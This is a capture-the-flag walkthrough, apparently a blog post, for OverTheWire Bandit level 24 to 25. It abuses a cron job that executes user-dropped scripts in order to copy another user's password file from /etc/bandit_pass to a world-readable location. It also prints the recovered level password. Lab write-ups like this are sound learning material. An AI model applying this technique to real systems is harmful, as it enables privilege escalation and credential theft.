OverTheWire - Bandit: Level 24 to Level 25
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Like before, the cron job calls a script in /usr/bin/
every minute
1 $ cat /etc/cron.d/cronjob_bandit24
2 @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
3 * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
The script has the following content:
1 cat /usr/bin/cronjob_bandit24.sh
2 #!/bin/bash
3
4 myname=$(whoami)
5
6 cd /var/spool/$myname/foo
7 echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
8 for i in * .*;
9 do
10 if [ "$i" != "." -a "$i" != ".." ];
11 then
12 echo "Handling $i"
13 owner="$(stat --format "%U" ./$i)"
14 if [ "${owner}" = "bandit23" ]; then
15 timeout -s 9 60 ./$i
16 fi
17 rm -f ./$i
18 fi
19 done
Let’s dissect what exactly this script does: The variable myname
will be bandit24
since this is the user running the cronjob. So, the path operated on will be /var/spool/bandit24/foo
. Then, for every file in this directory the owner will be checked. If the owner is bandit23
(our current user), the file will be executed for a maximum run time duration of 60 seconds until sig 9
will be sent to kill the process. Afterwards the file will be removed.
To “exploit” this, we can place our own shell script inside of this directory to run code as bandit24
and read the password which can be found at /etc/bandit_pass/bandit24
. Easiest is something like copying the file to a known location and changing its ownership. Something like:
1 #! /bin/bash
2 cp /etc/bandit_pass/bandit24 /tmp/shoujin_bandit24
3 chmod og+r /tmp/shoujin_bandit24
This script must be made executable via chmod uog+x <script>
After a short waiting period we can read the password from the copied file.
1 $ cat /tmp/shoujin_bandit24
2 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar